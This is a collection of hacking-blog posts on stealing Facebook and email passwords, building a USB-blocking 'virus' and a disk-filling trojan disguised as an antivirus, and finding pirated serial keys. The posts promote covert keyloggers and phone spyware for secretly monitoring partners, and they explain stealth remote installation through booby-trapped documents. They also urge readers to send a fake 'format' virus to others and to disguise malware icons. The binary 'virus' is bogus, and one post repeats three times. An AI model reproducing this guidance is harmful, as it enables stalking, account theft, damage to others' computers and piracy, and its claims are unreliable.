posted by:-)pavan pardhu
Hack Facebook Password: Facebook Hacking Explained
Every day I get a lot of emails from
people requesting me to hack Facebook passwords of their spouse,
girlfriend or boyfriend so as to reveal their secret relationships (if
any). Most of them are even willing to pay for the service.
However, I strongly deny any such
requests as I do not provide any paid hacking service on my site.
Anyway, in order to keep the knowledge free, I have decided to write
down this post using which you can easily manage to hack the Facebook
profile of your choice.
Possible Ways to Hack a Facebook Password:
With my experience of over 9 years in
the field of ethical hacking and IT security, all I can tell you is
that, there are only TWO ways to successfully hack a Facebook password.
Let me explain:
1. Keylogging – The Easiest Way!
Keylogging refers to simply recording
each and every keystroke that is typed on a specific computer’s
keyboard. This is possible with the use of a small computer program
called keylogger (also known as spy software). Once installed, this
program will automatically load from the start-up, runs in the invisible
mode and start capturing each and every keystroke that was typed on the
computer. This obviously includes the password of Facebook, email or
any other online account.
Some keyloggers with advanced features
can also capture screenshots and monitor every activity of the computer.
To use it, it doesn’t demand any special knowledge. That means, anyone
with a basic knowledge of computer can install and use this software
with ease.
Hence, for a novice computer user, this
method is the easiest way to hack a Facebook password. I recommend the
following keylogger as the best option you can go for:
Why SniperSpy is the Best?
Today, there exists hundreds of
keyloggers on the market where many of them are nothing more than a
crap. However, there are only a few that stand out of the crowd and
SniperSpy is the best among them.
I personally like SniperSpy for its REMOTE INSTALLATION FEATURE.
With this, you can install it on a remote computer without the need for
having physical access to it. It operates in a complete stealth mode so
that it remains 100% undetected!
Here is a summary of benefits that you will receive with Sniperspy:
-
Access ANY PasswordWith SniperSpy, you can easily hack Facebook or any other online account.
-
Monitor Every ActivityYou can monitor every activity of the target computer, take screenshots and record chats & IM conversations.
-
Never Get Caught!SniperSpy operates in a total stealth mode and thus remains undetected. Therefore you need not have the fear of being traced back or getting caught.
-
Completely Safe to UseSniperSpy is a reputed, trustworthy and reliable company that does not collect any personal information from your computer.
-
Works on both Windows and MacFully compatible with Windows 2000/XP/Vista/7/8 and Mac.
How it Works?
You can easily drop the deployment
module onto a word document, image or any other file and send it to the
target Facebook user. SniperSpy will install silently on the target
computer and the monitoring process will begin.
You can login to the secure control panel from any browser and start viewing the logs to get the password!
So, if you are really serious to hack Facebook password then SniperSpy is for you. Go grab it now and expose the truth!
Download SniperSpy – for Windows
Download SniperSpy – for Mac
What if the Target Person Logs into the Facebook Account using a Cell Phone?
In this case, you will have to use a spy
software that works on cell phones and mobile devices. The following is
one of my favorite software to spy on cell phones:
With SpyBubble you can Track Calls, Listen to LIVE Phone Calls, Record SMS & Emails, Know GPS locations of the target user and more.
Supported Phones: BlackBerry, Android, Symbian, iPhone and Windows Mobile.
So, what are you waiting for? Go grab SpyBubble now to expose the truth:
2. Phishing – The Difficult Way:
The other common way to hack passwords
or online accounts is via Phishing. This method will make use of a fake
login page (often called as spoofed web page) which will
exactly resemble the original one. Say for example, a spoofed web page
of Facebook looks exactly same as that of the original page. This page
is actually created by the hacker and is hosted on his own server.
Once the victim enters his/her password in such a fake login page, the
login details are stolen away by the hacker.
Phishing requires specialized knowledge
and high level skills to implement. Therefore, it would not be possible
for a noob user (perhaps like you) to attempt this trick. It is
a punishable offense too. So, I recommend that you stay away from
phishing and make use of the keylogger, as it is the easiest and the
safest way.
Facebook Hacking Methods that Do Not Work:
-
Many scam websites claim to have found out a certain vulnerability in Facebook servers which as a means can be exploited to crack the password. Unfortunately, there is no such vulnerability in Facebook (or any other online account) that can be exploited to crack the password. Never go behind any of those websites that promise to give you the password upon payment or completing a free survey.
-
There is no ready-made software program that is available to hack Facebook password (except the keylogger). In fact, keyloggers are pretty generic and are designed to log the keystrokes of a specific computer which is often used to hack passwords.
posted by:-pavan pardhu
(*)A VIRUS PROGRAM TO DISABLE USB PORTS!!
In this post, I will show how to create a simple virus that disables the USB ports on the computer (PC). As usual, I am using my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result you’ll will not be able to use your pen drive or any other USB peripheral devices on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.-
Download the source code of the virus program on to your computer from the following link:The download contains the following 2 files:
- block_usb.c (source code)
- unblock_usb.c (source code)
-
You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
-
To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.
-
You can also change the icon of this file to make it look like a legitimate program. For more details on this refer my post – How to Change the ICON of an EXE file (This step is also optional).
How it Works?
The idea behind the working of this virus is pretty straightforward. It works by gaining access to the Windows registry and modifying its settings to disable the USB device support on the computer.On the other hand, the other program will re-set the registry settings back to the normal so that the support for USB devices is re-enabled. I hope you like this post. Please pass your comments.
posted by:-)pavan pardhu
(*)Virus to Format Hard Disk !!!
Today i will show you how to make a virus to format Hard disk. You can send this file to your friend or enemy to format their Hard disk. But please dont try this on your own computer or else you will end up formatting your own computer.
- Copy the below codes into Notepad.
01001011000111110010010101010101010000011111100000
- Save the file as Format.exe
- You have created your virus. Enjoy !!!
(*)HOW TO HACK E-MAIL PASSWORD:EMAIL HACKING
On a regular basis, a lot of people contact me about suspecting their partner of cheating and ask me how to hack their email password, so as to find out the truth.
If you are in a similar situation or simply want to hack into someone’s email account, then this article will surely help you out. Here in this article I will try to uncover some of the real and working methods to hack the password of any email account!Possible Ways to Hack an Email Account:
With my experience of over 9 years in the field of ethical hacking and computer security, I can tell you that there exists only 2 foolproof methods to hack emails.1. Keylogging: The Easiest Way!
Keylogging simply refers to the process of recording each and every keystroke that a user types on a specific computer’s keyboard. This can be done using a small software program called keylogger (also known as spy software).After spending a lot of time and money on testing different software programs, I conclude the following keylogger as the best one you can go for:Here is a summary of SniperSpy Features:-
REMOTE Installation and REMOTE MonitoringYou can Remote install SniperSpy from anywhere even if you do not have physical access to the target computer. You can also install it on a local computer.
-
You can ACCESS ANY PASSWORDGain access to any password protected material such as Facebook, MySpace or any other email account.
-
MONITOR EVERY ACTIVITY on the Target ComputerWith SniperSpy, you can not only capture the passwords, but also spy on their IM conversations and take screenshots of the activities on the target computer.
-
NEVER GET CAUGHT!Since SniperSpy runs in a complete stealth mode, its presence on the target computer remains 100% Undetected. So you need not worry about being caught or traced back.
-
Extremely EASY TO USESince SniperSpySpy is designed for novice computer users, it requires no special skills to install and use.
-
Works on ALL VERSIONS of Windows and MacFully compatible with Windows 2000/XP/Vista/7/8 and Mac.
How it Works?
Deployment is not normally a problem because the small (81kb) module file can be renamed to anything you want and dropped inside a Word, Image or Zip file and sent through many regular email services. This makes the remote installation very easy and stealth.You get a detailed step-by-step instruction and technical support after you purchase the software. So, what are you waiting for? Go grab SniperSpy now and expose the truth!What if the Target Person Uses his/her CELL PHONE to Access Emails?About 30% of the users today, use their mobile devices to surf Internet and access emails. As a result of this, it is necessary to spy not only on their computers, but also on their cell phones to hack the email password.The following software is my best choice to spy on cell phones:This software system will allow you to log in from any computer and supervise any smart phone or BlackBerry on real time.Here is a list of SpyBubble features:
-
Call Tracking: Get complete details on every incoming and outgoing call including time of call and dialed number.
-
SMS Tracking: You can read any message that was received by or sent from the phone.
-
Email Tracking: You can read every incoming and outgoing email.
-
GPS Location Tracking: Track exact position of the phone using Google maps.
-
URL & Photo Tracking: Logs the URL of every website that was accessed from the phone and uploads every photo that was sent and received.
-
Supported Phones: Supports BlackBerry, Android, Symbian, iPhone and Windows Mobile.
For more information on how to hack passwords from cell phone, read my other post on: How to Spy on Cell Phones?2. Phishing: The Difficult Way
Phishing is the other most commonly used technique to hack email passwords. This method involves the use of Fake Login Pages (spoofed webpages) whose look and feel are almost identical to that of legitimate websites.Fake login pages are created by many hackers which appear exactly as Gmail or Yahoo login pages. But, once you enter your login details on such a fake login page, they are actually stolen away by the hacker.However, carrying out a phishing attack demands an in-depth expertise in the field of hacking. It requires you to have a knowledge of HTML, CSS and scripting languages like PHP or JSP.Also, phishing is considered as a serious criminal offense and hence it is a risky job to attempt it. In this post, I would limit the information on phishing which otherwise could lead to the misuse of information by attackers to cause potential harm. So, I recommend the usage of keyloggers as the best possible way to gain access to any email password.Common Myths and Scams Associated with Email Hacking:
Well, before I conclude, I would like to give all of my readers a word of caution!Today, there are many scam websites out there on the Internet which often misguide users with false information. Some of them may even rip off your pockets with false promises. So, here are some of the things that you need to be aware of:-
There is no ready-made software program (except the keylogger) that can hack emails and get you the password instantly just with a click of a button. So, if you come across any website that claims to sell such programs, I would advise you to stay away from them.
-
Never trust any hacking service that claims to hack any email for just $100 or $200. All I can tell you is that, most of them are no more than a scam.
-
I have seen many websites on the Internet that are distributing fake tutorials on email hacking. Most of these tutorials will tell you something like this: “you need to send an email to passwordrecovery@gmail.comalong with your username and password” (or something similar).Beware! Never give away your password to anyone nor send it to any email address. If you do so, you will lose your own password in attempt to hack somebody else’s password.
I hope you found this post interesting and informative. Please do not misuse any of the information provided in this article.posted by:-)pavan pardhu
(*)HOW TO MAKE TROJAN HORSE!
Most of you may be curious to know about how to make a Trojan or Virus on your own. Well, here is an answer to your curiosity. In this, post I’ll show you how to make a simple trojan on your own using the C programming language.
This trojan when executed will eat up the hard disk space on the root drive (The drive on which the Windows is installed, usually C: Drive) of the computer on which it is run. Also, this trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run.So, I’ll call this as Space Eater Trojan. Since this program is written using a high level programming language, it is often undetected by antivirus programs. The source code for this program is available for download at the end of this post. Let’s see how this trojan works:Before I move on to explain the working of this program, you need to know what exactly is a Trojan horse and how it works. Unlike what many of us think, a trojan horse is not a virus. In simple words, it is just a program that appears to do a favorable task but in reality performs undisclosed malicious functions that allow the attacker to gain unauthorized access to the host machine or cause a damage to the computer.Now let’s move on to the working of our Trojan:
The trojan horse which I have created appears itself as an antivirus program that scans the computer for malware programs. However, in reality it does nothing other than eating up the hard disk space on the root drive by filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result, the the root drive gets filled up completely with in minutes of running this program.Once the disk space is full, the trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any of the cleanup program. This is because, the trojan intelligently creates a huge file in the Windows\System32 folder with the .dll extension. Since the junk file has the .dll extension it is often ignored by the disk cleanup software. Hence there is now way to recover the hard disk space other than reformatting the drive.The algorithm of the Trojan is as follows:
-
Search for the root drive.
-
Navigate to %systemroot%\Windows\System32 on the root drive.
-
Create the file named “spceshot.dll“.
-
Start dumping the junk data onto the above file and keep increasing its size until the drive is full.
-
Once the drive is full, stop the process.
You can download the Trojan source code HERE. Please note that I have not included the executable for security reasons. You need to compile it to obtain the executable.How to compile the program?
For step-by-step compilation guide, refer my post How to compile C Programs.How to test this trojan horse?
To test the trojan, just run the SpaceEater.exe file on your computer. It will generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up the hard disk space.NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.How to fix the damage and free up the space?
To remove the damage and free up the space, just type the following in the “run” dialog box:%systemroot%\system32Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.NOTE: You can also change the ICON of the virus to make it look like a legitimate program. This method is described in the post: How to Change the ICON of an EXE file ? -
Finding Serial Key Of Any Software Using Simple Google Trick
Most of you download and use pirated software from torrents or any such other sites, but sometime it gets very difficult to find serial key of those softwares. I will make it easy for you by showing you simple yet very intersting google trick which will allow you to find serial key of any software very easily.
How To Find Serial Key Of Any Software ?
The key 94FBR is a part of Office 2000 Pro CD activation
key that is widely distributed as it bypasses the activation
requirements of Office 2000 Pro. By searching for 94fbr and the product
name, you are guarantee that the pages that are returned are pages
dealing specifically with the product you're wanting a serial for.
Follow simple steps given below to learn this trick
1. Go to Google
2. Then type Software Name 94FBR
- Replace Software Name with the name of software whose serial key you want to find
- Eg: To find serial key of Nero i will type Nero 94fbr
More Such Awesome
Finding Serial Key Of Any Software Using Simple Google Trick
Most of you download and use pirated software from torrents or any such other sites, but sometime it gets very difficult to find serial key of those softwares. I will make it easy for you by showing you simple yet very intersting google trick which will allow you to find serial key of any software very easily.
How To Find Serial Key Of Any Software ?
The key 94FBR is a part of Office 2000 Pro CD activation
key that is widely distributed as it bypasses the activation
requirements of Office 2000 Pro. By searching for 94fbr and the product
name, you are guarantee that the pages that are returned are pages
dealing specifically with the product you're wanting a serial for.
Follow simple steps given below to learn this trick
1. Go to Google
2. Then type Software Name 94FBR
- Replace Software Name with the name of software whose serial key you want to find
- Eg: To find serial key of Nero i will type Nero 94fbr
More Such Awesome
Finding Serial Key Of Any Software Using Simple Google Trick
Most of you download and use pirated software from torrents or any such other sites, but sometime it gets very difficult to find serial key of those softwares. I will make it easy for you by showing you simple yet very intersting google trick which will allow you to find serial key of any software very easily.
How To Find Serial Key Of Any Software ?
The key 94FBR is a part of Office 2000 Pro CD activation
key that is widely distributed as it bypasses the activation
requirements of Office 2000 Pro. By searching for 94fbr and the product
name, you are guarantee that the pages that are returned are pages
dealing specifically with the product you're wanting a serial for.
Follow simple steps given below to learn this trick
1. Go to Google
2. Then type Software Name 94FBR
- Replace Software Name with the name of software whose serial key you want to find
- Eg: To find serial key of Nero i will type Nero 94fbr
No comments:
Post a Comment